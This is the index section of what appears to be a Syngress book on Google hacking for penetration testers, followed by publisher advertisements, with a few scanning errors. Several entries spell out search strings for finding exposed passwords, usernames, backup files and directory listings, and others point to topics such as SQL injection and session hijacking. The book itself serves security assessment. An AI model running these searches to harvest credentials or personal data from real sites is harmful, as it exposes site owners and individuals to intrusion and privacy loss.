Apache, 236-237 page titles, IIS, 227-228 Web application security (Web app sec), 448 Escaping from literal expressions, 463-468 Ethereal packet sniffer, 456-457 Ethical hacking methodology, 420 Eudora, 134 Excessive metadata, 319 Expanding (stemming ), 15, 23 Explicit sexual content, 11 Exploit code, locating common code strings, 184-186 pubUc sites, 182—183 Exploits description, 182 Exposure, 426 Exposure, checking, 360-361 Extensions, see File extensions External blind security assessment, 152 -ext:html -ext:htm —ext:shtml -ext:asp —ext:php searches, 212-216 F File extensions C code (.c), 182-183 erroneous, 449-45 1 financial programs, 280 list of, 54-55 scripts, 330 searching, 54-58 Structured Query Language (SQL), 310 top 20,213 top 25, 55-56 walking, 111-114 Web source for, 318 File names finding in directory listings, 102-103 searching for, 267 variations of, 119 File types, see File extensions filetype arguments, ORing, 295 filetype operator, 54-58, 111 filetype search type for Gooscan, 336 filetype. gs file for Gooscan, 337-338 FILExt database, 56 Filling stations, 145 Filter parameter for API, 372 filter variable, 28 Finance programs, personal, 279—280 Financial data, personal, 279-284 Footer text, finding, 191-192 Forgotten password recovery mechanisms, 275 Forms, user authentication, 328 Forum, Search Engine Hacking, 262 Foundstone, 383 FQDN (fuUy qualified domain names), 152 Framing, cross-site, 460 FTP log files, 446-447 FuUy qualified domain names (FQDN), 152 490 Index G Gas stations, 145 gdork.gs file for Gooscan, 337 Geographic regions, 33-34 GHDB (Google Hacking Database), 174-175, 194, 262, 359 GNU Zebra, 21 Google, getting help fi-om, 354-357 Google API. 
see Application Programming Interface (API) Google appliance, 334 Google Desktop Search, 316, 318 Google Groups, see Newsgroups Google Groups Advanced Search feature, 127 Google Hacking Database (GHDB), 174-175, 194, 262, 359 Google Image search feature, 8-9 Google Local, 143-145 Googlebot, 325 Googleturds, 54 Gooscan tool data files, 335-338 description, 199, 332-333 installation, 333 options, 334-335 use of, 338-342 Government auditing organizations, 420 grep command, 235 Grinding, automated, 312-315 group operator, 69 Groups, see Newsgroups H Hackers, 59, 63-64, 78 Hacking, constraints of, 443-445 Hardware, Web-enabled, 171-172, 178-179,255-258 H.E.A.T. tool, 223 Help-desk references, 124 Help from Google, 354-357 "Helper" programs, 14 Hexadecimal codes, 26 Hidden form fields, 453 Hidden JavaScript, 453 Highlighting, 49, 95 hi (home language) codes, 6, 28, 30-32 host command, 90 "How-to" guides, 124-125 HP Insight Management Agents, locating, 172 Jitaccess files, 324, 329-330 HTML comments, 447-448 HTML or text, conversion to, 56—58 HTTP requests and responses, 453-456 httpd.conf configuration files, 231, 261-262, 325 Human-friendly queries, 23 Human Resources departments, 123 I Ideahamsters, 421 Identified weaknesses, 427 IDS (intrustion detection systems), 484 Index 491 ie (input encoding) codes, 28 Ignored words, 15-16 Ihackstuff, 415 IIS. 
see Internet Information Server (IIS)
I'm Feeling Lucky button, 4
Image search feature, 8-9
image tags, 463, 465-467
inanchor operator, 62, 78
inauthor operator, 3
.INC files, 320
Include files
  C code, 184
  protecting, 320
  server-side, 113
Incremental substitution, 110-111
Indemnification, 428
"Index of" directory listings, 100-102
Index Server, 248-249
Indexes, Apache. see Directory listings
indexof search type for Gooscan, 336
indexof.gs file for Gooscan, 338
info operator, 65
Information disclosure, 443
Information leaks, 319, 354
Instant messaging, 140-141
Instant Messenger (AIM) buddy lists, 283
Institute for Security and Open Methodologies (ISECOM), 421
insubject operator, 69-70
Integrity, 428-429
Interface
  language tools, 12-14
  newsgroups, 5-8
  preferences, 9-12
  Web results page, 5-6
  Web search page, 2-4
Internet Information Server (IIS)
  bad file extensions, 449-451
  default documentation, 247
  default Web pages, 244-245
  error messages, customized, 261
  error messages, finding, 225-229
  error-page titles, 227-228
  locking down, 330
  securing, 360
  Security Checklist, 330
Internet Protocol (IP) addresses, 152-153
intitle operator
  description, 46-48
  examples, 43-44, 101-109
intitle search type for Gooscan, 336
intitle:index.of searches, 206
intranet | help.desk searches, 216-217
Intranets, 124
Intrusion detection systems (IDS), 484
inurl operator, 50-51, 77, 92
inurl search type for Gooscan, 336
inurl.gs file for Gooscan, 338
inurl:temp | inurl:tmp | inurl:backup | inurl:bak searches, 216
IP (Internet Protocol) addresses, 152-153
ISECOM (Institute for Security and Open Methodologies), 421
ITFAQnet.com, 85

J
Java, 371
JavaScript Document Object Model (DOM), 465-466
Job postings, 126
John the Ripper password cracker, 273
Julian dates, 64

K
Keys. see License keys for API

L
langpair parameter, 96
Language, translation of, 5-6, 12-13
Language restrict (lr) codes, 28-31
Language settings for proxy servers, 11
Language tools, 4, 12-14
Language use codes. see Home language (hl) codes
Languages for API, 373
Lantronix web-managers, locating, 172
Laptops with built-in cameras, 145
Leaks of information, 319, 354
Libraries, automation, 384-386
Libwhisker Perl library, 110
License keys for API, 128, 327, 348
Limit of 10 words, 16-17
Limitations, security, 425-427
link operator, 59-62, 79, 160
Links
  from and to targets, 160-161
  mapping, 159-164
  pages without, 118
  removing, 356
  to specified URLs, searching, 59-62
Literal expressions, escaping from, 463-468
Local proxies, 457-458
Lockouts, 368
Log files, 296, 298-299
Logging Web connections, 88-89
login | logon searches, 208-209
Login portals, 250-255, 302-304
Login prompts, 191
Long, Johnny, 332
Looking Glass servers, locating, 173
Lord, Steve, 343
Loss controls, 427
lr (language restrict) codes, 28-31
Lucky button, 4
lynx command-line browser, 156-157

M
Macintosh Gooscan, 333
Mail. see E-mail
Mapping
  domain determination, 154-155
  link mapping, 159-164
  methodology, 152-153
  page scraping, 156-158
  scripting, 158-159
  site crawling, 155-156
Masking query host address, 167
maxResults variable, 28
Message identifiers, searching for, 70-71
Messages, error. see Error messages
Messaging, instant, 140-141
META tags, 327-328
Metadata, excessive, 319
Microsoft. see Access database; Index Server; Internet Information Server (IIS); .NET framework; Outlook; Outlook Web Access; SQL Server; Web Data Administrator software package
Microsoft C#, 371
Microsoft Money, 279-280
Minus (-) operator, 19-20
Mixing advanced operators, 43, 75-76
Money, Microsoft, 279-280
msgid operator, 70-71
MSN Messenger contact list files, 283
Multilingual password searches, 275-276
Multiple-query mode for Gooscan, 340
mysql_connect function, 305

N
Name formation for domains, 152
Narrowing searches, 14
Native language, 9
Negative queries, 156
Nessus security scanner, 284
Nessus tool, 223
Netcraft, 171
Netscape servers, 245
Network devices, Web-enabled, 171-172, 178-179, 255-258
Network printers, 257
Network Query Tool (NQT), 166-171
Network reports, locating, 173-175
Network vulnerability reports, 280
Newsgroups
  authors, searching, 66-69
  Google Groups Advanced Search feature, 127
  interface, 5-8
  post titles, searching, 46-49, 66-69
  posts, removing, 357
  tracing, 164-166
  USENET, 6-7
Nightclubs, 145
NIKTO security database, 406
Nikto tool, 110, 201, 332
Nmap tool, 223
NNTP-Posting-Host, 165
No-cache pragma, 360
NOARCHIVE in META tag, 327
Nomad, Simple, 438
Non-Google Web utilities, 166-171
Non-repudiation, 428
Nonconfrontational contact, 143
NOSNIPPET in META tag, 327-328
NOT operator, 374
Novell Management Portal, 252
NQT (Network Query Tool), 166-171
nslookup command, 90
ntop programs, 173
Number of Results setting, 12
Numbers within a range, searching, 63
numrange operator, 63

O
OASIS WAS Vulnerability Types and Vulnerability Ranking Model, 442
oe (output encoding) codes, 28
Office documents, 299-301
Open Source Security Testing Methodology Manual (OSSTMM)
  improving, 436
  methodology chart, 430
  origins, 420-421
  other security methodologies, 435
  security presence, 422-423, 431-433
  standardized methodology, 424-429
Opera Web browser
  disabling Google crawling, 119
  finding pages without links, 118
Operating systems of servers, 108
Operational security, 424-425
Operators
  advanced, combining, 43, 75-76
  in AltaVista, 85-86
  Boolean, 18, 43, 58
  colliding, 75
  description, 46
  examples, 43-44
  list of, 42, 75-76, 80-84
  mixing, 43, 75-76
  OR, 374
  other search engines, 85-86
  syntax, 43
  Web site, 86
  in Yahoo, 85
  see also Operators, specific
Operators, specific
  - (minus), 19-20
  + (plus), 19
  allintext, 43, 49-50, 77
  allintitle, 43, 48-49
  allinurl, 43, 51-52, 78
  AND, 18-19
  author, 66-69
  bphonebook, 73
  cache operator, 62-63
  daterange operator, 64-65
  define, 72
  filetype, 54-58, 111
  group, 69
  inanchor, 62, 78
  inauthor, 3
  info, 65
  insubject, 69-70
  intitle, 43-44, 46-48, 101-109
  inurl, 50-51, 77, 92
  link, 59-62, 79
  msgid, 70-71
  NOT, 374
  numrange, 63
  OR, 374
  phonebook, 72-75
  related, 66
  rphonebook, 73
  site, 52-54, 77-79, 204-205, 332
  stocks, 71-72
  see also Operators
OR operator, 374
Oracle database, 475
ORing filetype arguments, 295
OSSTMM. see Open Source Security Testing Methodology Manual (OSSTMM)
Outdated links, removing, 356
Outlook, 134-135
Outlook Web Access portal, 251, 268-269

P
Packet sniffer, Ethereal, 456-457
Packets, 453-459
Page scraping, 156-158, 414
Page text, searching, 49-50
Page titles
  Apache error messages, 236-237
  IIS error messages, 227-228
  searching, 46-49
Palookaville, 326
Parameters for searches, 27-28
Parentheses
  ignored, 20
  use of, 375
password | passcode | "your password is" searches, 210
Password crackers, 273
Password file, system, 110
Password prompts, 191
Password-protection mechanisms, 328-330
Passwords
  authentication, 329
  clear text, 274
  encrypted or encoded, 273-274
  encryption, 288
  forgotten password recovery mechanisms, 275
  searching for, 270-275
  shared, 287-288
Patches, security, 331
Penetration testers, 92, 222, 420
Perl
  CPAN modules, 162
  implementation of API, 386-390, 406-411
  scripting, 158-159, 312-315
Personal e-mail folders, 135
Personal finance programs, 279-280
Personal financial data, 279-284
Personal information, 142
Personal Web pages and blogs, 140
Personnel channel, 423
Personnel departments, 123
Phishing
  to catch scammers, 278-279
  cross-site framing, 460
  scams, 277-279, 287
Phone numbers
  removing from Google list, 74
  searching for, 72-75
phonebook operator, 72-75
PHP files, 113
Phrack, 164
Phrase searches, 18
Physical assessment, 143
Physical channel, 423
Pipe symbol (|), 20, 374
Plus (+) operator, 19
Policies, security, 322-323
Polling, public, 126
Pop-up advertisements, 12
Portals, login, 250-255, 302-304
Ports, multiple, 178
Portscans, 223
Post titles, searching, 46-49, 66-69
Posts, removing, 357
"Powered by" tags, 188, 192-193
Pragma, no-cache, 360
Preassessment
  checklist, 146
  information-gathering techniques, 122
Preferences, 4, 9-12
Printers, network, 257
Privacy, 428
Process of searching, 17-20
Professional security testing, 419-420
Profiling servers, 223-225
The Programmer's Ultimate Security Desk Reference, 482
Proxies, local, 457-458
Proxy checkers, 99, 117
Proxy servers
  anonymity, 91-92
  Google translation as, 95-99
  language settings, 11
  locating, 92
  translation service, 6
Pseudoanonymity, 67
Pseudocoding, 385
Putting the Tea Back into CyberTerrorism, 131
Python implementation of API, 390-393

Q
q variable, 28
Queries
  automated, 157
  locating Apache versions, 105-107
  locating database error messages, 306-308
  locating database files, 311
  locating database interfaces, 303
  locating database support files, 304-305
  locating default Apache installations, 243-244
  locating default documentation, 248
  locating default programs, 250
  locating e-mail addresses, 137-138
  locating login portals, 253-255
  locating more esoteric servers, 246
  locating Netscape servers, 245
  locating passwords, 270-273
  locating potentially sensitive office documents, 301
  locating specific and esoteric server versions, 107-108
  locating specific IIS server versions, 244
  locating SQL database dumps, 310
  locating user names, 265-266
  locating various network devices, 258
  locating various sensitive information, 281-283
  negative, 156
Querystrings, 456
Question mark (?), 25
Quicken, 279-280
Quotation marks ("), 16, 18

R
Rain Forest Puppy (RFP), 110
Range of dates, searching, 64-65
Range of numbers, searching, 63
Ranta, Don, 313
raw search type for Gooscan, 337
Recovery mechanisms, password, 275
Reduction (narrowing) of searches, 21-24
Regions, geographic, 33-34
Registration screens, 328
Registry files, Windows, 136, 268
related operator, 66
Related sites, searching, 66
Reloading, shift-, 90
Remote scripts, 465
Rendered view, 290
Reports, locating, 173-175
Residential phone numbers, searching for, 72-73
Responses, API, 376-377
restrict codes, 32-36
restrict variable, 28, 32-33
Restriction rules, 373-374
Results, number of, 12
Results page, 5
Resumes, 142
Retina tool, 223
Robots. see Crawlers
Robots.txt files, 325-327, 360, 445-446
Rotator programs, 167-170
rphonebook operator, 73

S
safe variable, 29
SafeSearch Filtering, 11
Safety, 429
Sample API code, 377-383
Sample files, 449
Sample programs, 248-250
SANS Top 20 list, 220
Scanner, Nessus, 284
Scanner programs, 198
Scanning, CGI, 197-199, 201
Scraping pages, 156-158, 414
Scripts
  automated grinding, 312-315
  cross-site scripting (XSS), 461-462, 466-468
  for debugging, 304
  dns-mine.pl, 158-159, 377-383
  file extensions, 330
  remote, 465
Search Engine Hacking forum, 262
Search fields, 3
Search rules
  case sensitivity, 14-15
  ignored words, 15-16
  limit of 10 words, 16-17
  stemming (expanding), 15, 23
  wildcards, 15-16
Search string for Gooscan, 337
Search-term input field, 4
Searches
  admin | administrator, 210-212
  Advanced Search link, 4
  authors, 66-69, 164-166
  automating, 331
  base searches, 22
  cache, Google, 62-63
  criteria, 365-1305
  dates within a range, 64-65
  definitions of terms, 72
  error | warning, 206-207
  -ext:html -ext:htm -ext:shtml -ext:asp -ext:php, 212-216
  Google Desktop Search, 316
  intitle:index.of, 206
  intranet | help.desk, 216-217
  inurl:temp | inurl:tmp | inurl:backup | inurl:bak, 216
  links to specified URLs, 59-62
  login | logon, 208-209
  message identifiers, 70-71
  in newsgroup post titles, 46-49
  newsgroup authors, 66-69
  newsgroup post titles, 66-69
  numbers within a range, 63
  in page text, 49-50
  in page titles, 46-49
  parameters, 27-28
  parameters for API, yiX—yiT
  password | passcode | "your password is," 210
  phrases, 18
  process, 17-20
  reduction (narrowing), 21-24
  requests, API, 375-376
  responses, API, 376-377
  results page, 5
  site summaries, 65
  sites related to a site, 66
  space between elements, 43
  specific file types, 52-54
  specific servers or domains, 52-54
  stock symbols, 71-72
  telephone numbers, 72-75
  username | userid | employee.ID | "your username is," 209
  see also Search rules
Secure Sockets Layer (SSL), 482
Security
  access, 425
  actual, 425-427
  alarm, 429
  anomaly, 426-427
  assessment, blind, 152
  authentication, 428
  concern, 426
  confidentiality, 428
  continuity, 429
  data networks channel, 423
  ethical hacking methodology, 420
  exposure, 426
  government auditing organizations, 420
  ideahamsters, 421
  indemnification, 428
  Institute for Security and Open Methodologies (ISECOM), 421
  integrity, 428-429
  limitations, 425-427
  loss controls, 427
  non-repudiation, 428
  operational, 424-425
  patches, 331
  penetration testers, 92, 222, 420
  personnel channel, 423
  physical channel, 423
  policies, 322-323
  privacy, 428
  safety, 429
  scanner, Nessus, 284
  standardized methodology, 423
  telecommunications channel, 423
  testing, professional, 419-420
  trust, 425
  usability, 429
  visibility, 424-425
  vulnerability, 426, 444
  weakness, 426-427
  wireless communications channel, 423
  see also Open Source Security Testing Methodology Manual (OSSTMM); Web application security (Web app sec)
Security presence channels, 422-423, 431-433
SensePost, 154, 158, 278, 351
Server-side includes, 113
server tag in directory listings, 223-225, 261
Server versions
  Apache, 105-108
  finding, 103
  operating systems, 108
  uses of, 104
Servers, Web
  error messages, Apache, 229-238
  error messages, applications', 238-241
  error messages, MS-IIS, 225-229
  esoteric, 246
  locating and profiling, 223-225
  public, 323
  safeguards, 323
  searching, 52-54
  see also Server versions
Session hijacking, 468-471
Session management, 442
Settings, default, 330
Sexual content, 11
Shift-reloading, 90
Simple Nomad, 438
Single-query mode for Gooscan, 338-339
Site crawling, 155-156
site operator, 52-54, 77-79, 204-205, 332
Site summaries, searching, 65
SiteDigger tool, 346, 348-351, 359, 383
Snippets, 327-328
SOAP::Lite, 128
Social Security numbers (SSNs), 279
Socket-class functionality, 414
Socket initialization, 386
Software default settings, 330
Sony VAIO laptops, 145
Source code, uses for, 112-113, 189-197
Space between search elements, 43
Spam, 439
Special characters, 26, 43
Specific file types, searching, 52-54
Specific servers or domains, searching, 52-54
SPI Dynamics, 238
SQL. see Structured Query Language (SQL)
SQL Server database, 475
SSL (Secure Sockets Layer), 482
SSNs (Social Security numbers), searching for, 279
Standardized methodology, 423
start variable, 28
Stock quotations, 71-72
stocks operator, 71-72
Stop words, 15
Structured Query Language (SQL)
  dumps, 309-310
  file extension, 310
  injection attacks, 301, 308, 442-443, 471-474, 484
  mysql_connect function, 305
Student IDs, 279
Subdomains, 153
Submit Search button, 4
Substitution, incremental, 110-111
sullo, 332
Support files of databases, 304-306
Symbols, stock ticker, 71-72
Syntax
  search terms, 43
  universal resource locators (URLs), 25-26
  wrongness ignored, 20
System password file, 110

T
Tabs, 4
Targets, vulnerable. see Vulnerable targets, locating
tcpdump
  command, 89-90, 97
  output, 90, 92-93, 97-98
Tea, Putting Back into CyberTerrorism, 131
Telecommunications channel, 423
Telephone numbers
  removing from Google list, 74
  searching for, 72-75
Temmingh, Roelof, 128, 154, 158, 351
10-word limit, 16-17
Term input field, 4
Terms, getting definitions of, 72
Terms of Service
  Athena, 343
  automated queries, 157, 314
  Gooscan, 331-332, 334, 340
  Web sites for, 368-369
Testers, penetration, 92, 222
Text of pages, searching, 49-50
Text or HTML, conversion to, 56-58
Ticker symbols, 71-72
Titles of pages, searching, 46-49
TLD (top-level domain), 154
Toolbars, 3, 14, 39
Top-level domain (TLD), 154
Topic restriction rules, 373-374
Tracing groups, 164-166
Traffic reports, 447
Translation, 5-6, 12-13
Translation proxies, 5
Translation service, 95-98
Traversal, 108-110
Trojans, 438-439
Troubleshooting, 44-45
Trust, 425
Types of files, searching, 52-54

U
Unified Modeling Language (UML) diagram, 385
Universal resource locators (URLs)
  construction, 27-36
  description, 24-25
  links to specified URLs, searching for, 59-62
  removal, automatic, 355-356
  searching in, 50-52
  special characters, 26
  structure, 50
  syntax, 25-26
Usability, 429
USENET newsgroups, 6-7
User authentication forms, 328
User names
  creation process, 265
  searching for, 264-270
  sources for, 265-266
username | userid | employee.ID | "your username is" searches, 209
Utilities, non-Google, 166-171

V
VAIO laptops, 145
Versions of servers. see Server versions
view source, 113
Viruses, 438-439
Visibility, 424-425
Vulnerability, 426, 444
Vulnerability reports, 283
Vulnerable targets, locating
  in advisories, 186, 190
  applications, vulnerable, 194-197
  via CGI scanning, 197-199, 201
  via demonstration pages, 187-189
  via source code, 189-197
  techniques, 202

W
Watts, Blake, 397
Weakness, 426-427
Web Application Security Consortium, 442
Web application security (Web app sec)
  authentication, 442
  bad file extensions, 449-451
  client-side attacks, 459-462
  command injection, 442-443, 471-474
  cookies, 456, 458, 468-471
  description, 438-439
  error messages, 448
  FTP log files, 446-447
  hidden form fields and JavaScript, 453
  HTML comments, 447-448
  information disclosure, 443
  sample files, 449
  session management, 442
  system documentation, 452
  uniqueness, 439-440
  vulnerabilities, 440-443
  vulnerability, 444
  Web traffic reports, 447
Web assessment tools, 238
Web-based mailing lists, 141
Web connections, logging, 88-89
Web Data Administrator software package, 302
Web-enabled network devices, 171-172, 178-179, 255-258
Web filtering, 439
Web pages, personal, 140
Web results page, 5-6
Web search page, 2-4
Web servers. see Servers, Web
Web sites
  advanced operators, 86
  Athena, 359
  Athena configuration files, 348
  basic searching, 38
  default pages, 241-246
  excessive metadata, 319
  file extensions, 318
  FILExt database, 56
  frequently asked questions (FAQ), 85
  Google Desktop Search, 318
  Google details, 86
  Google Groups Advanced Search feature, 127
  Google Hacking Database (GHDB), 359
  Google Local, 143-145
  Gooscan tool, 199, 333
  .htaccess files, 330
  John the Ripper password cracker, 273
  language-specific interfaces, 10
  Libwhisker Perl library, 110
  lockouts, 368
  Netcraft, 171
  NIKTO security database, 406
  phishing, 287
  proxy checkers, 99, 117
  robots.txt files, 325, 360, 445-446
  SANS Top 20 list, 220
  SiteDigger tool, 348, 359
  Terms of Service, 368-369
  USENET, 6
  Web Application Security Consortium, 442
  WebInspect tool, 119
  Wikto tool, 199
  XCode package for Macintosh, 333
Web traffic reports, 447
Web utilities, non-Google, 166-171
Webalizer program, 267
Webcams, 256
WebInspect tool, 119, 238
Weighting, 161-163
Whisker tool, 110
Wikto tool, 199, 351-354
Wildcards, 15-16
Windows registry files, 136, 268
Windows tools
  Athena, description of, 343-345
  Athena configuration files, 345-348
  Google API license keys, 348
  .NET framework, 342
  requirements, 342
  SiteDigger, 346, 348-351
  Wikto, 199, 351-354
Windows Update, 342
Wireless communications channel, 423
"Wish lists," Amazon, 142
Word order, 86
Words in searches
  ignored, 15-16
  limit of 10, 16-17
Worms, 164
WS_FTP program, 291

X
XCode package for Macintosh, 333
XSS (cross-site scripting), 461-462, 466-468

Y
"Your password is" searches, 210
"Your username is" searches, 209

Z
Zebra, 21
Zero day exploits, 182

Syngress: The Definition of a Serious Security Library
AVAILABLE NOW
order @ www.syngress.com

Syn-gress (sin-gres): noun, sing. Freedom from risk or danger; safety. See security.

Inside the SPAM Cartel
For most people, the term "SPAM" conjures up the image of hundreds of annoying, and at times offensive, e-mails flooding your inbox every week. But for a few, SPAM is a way of life that delivers an adrenaline rush fueled by cash, danger, retribution, porn and the avoidance of local, federal, and international law enforcement agencies. Inside the SPAM Cartel offers readers a never-before view inside this dark sub-economy. You'll meet the characters that control the flow of money as well as the hackers and programmers committed to keeping the enterprise up and running.
ISBN: 1-932266-86-0
Price: $49.95 U.S. $72.95 CAN

Nessus Network Auditing
Crackers constantly probe machines looking for both old and new vulnerabilities.
In order to avoid becoming a casualty of a casual cracker, savvy sys admins audit their own machines before they're probed by hostile outsiders (or even hostile insiders). Nessus is the premier Open Source vulnerability assessment tool, and was recently voted the "most popular" open source security tool of any kind. This is the first book available on Nessus and it is written by the world's premier Nessus developers led by the creator of Nessus, Renaud Deraison.
ISBN: 1-931836-08-6
Price: $49.95 U.S. $69.95 CAN

Stealing the Network: How to Own a Continent
Last year, Stealing the Network: How to Own the Box became a blockbuster bestseller and garnered universal acclaim as a techno thriller firmly rooted in reality and technical accuracy. Now, the sequel is available and it's even more controversial than the original. Stealing the Network: How to Own a Continent does for cyber-terrorism buffs what "Hunt for Red October" did for cold-war era military buffs: it develops a chillingly realistic plot that taps into our sense of dread and fascination with the terrible possibilities of man's inventions run amuck.
ISBN: 1-931836-05-1
Price: $49.95 U.S. $69.95 CAN